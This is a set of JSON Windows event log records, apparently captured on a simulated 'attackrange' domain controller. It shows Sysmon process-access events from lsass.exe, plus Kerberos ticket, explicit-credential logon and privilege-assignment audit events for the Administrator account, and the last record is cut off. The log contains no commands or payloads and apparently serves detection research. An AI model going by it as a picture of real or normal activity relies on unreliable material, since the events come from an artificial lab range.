{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.267\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.267","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.267\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.267","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220469,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220470,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220471,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220472,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x67D63\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x67d63","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220473,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x67D63\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x67d63","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","